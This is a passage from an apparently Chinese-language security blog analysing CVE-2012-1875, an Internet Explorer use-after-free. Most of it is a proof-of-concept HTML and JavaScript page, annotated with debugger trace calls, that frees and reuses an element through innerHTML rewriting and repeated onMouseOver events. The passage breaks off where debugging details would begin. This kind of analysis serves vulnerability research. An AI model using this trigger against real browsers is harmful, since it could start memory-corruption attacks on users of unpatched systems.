Intro
大牛ga1ois在《关于泄漏的艺术》一文中提到CVE-2012-1875是一个可以从脚本层面直接访问的UAF。以前没分析过这种类型的UAF,这两天趁着年后不忙看了一下漏洞成因。
POC
POC来自看雪,按照惯例添加了一些代码方便跟踪整个过程:
<HTML>
<DIV id=testfaild>
<img id="imgTest">
<div id="imgTest"></div>
<input id="4B5F5F4B" onMouseOver="crash();"></input>
</DIV>
<script language="JavaScript">
function crash() {
Math.atan2(0xbabe, "[*] calling crash...");
eval("imgTest").src = "";
Math.atan2(0xbabe, "[*] after set imgTest...");
}
function trigger() {
var x =document.getElementsByTagName("input");
Math.atan2(0xbabe, "[*] fireEvent onMouseOver 1st...");
x[0].fireEvent("onMouseOver");
Math.atan2(0xbabe, "[*] Before free object...");
testfaild.innerHTML = testfaild.innerHTML;
Math.atan2(0xbabe, "[*] After free object...");
Math.atan2(0xbabe, "[*] fireEvent onMouseOver 2nd...");
x[0].fireEvent("onMouseOver");
}
trigger();
</script>
</HTML>调试的IE版本: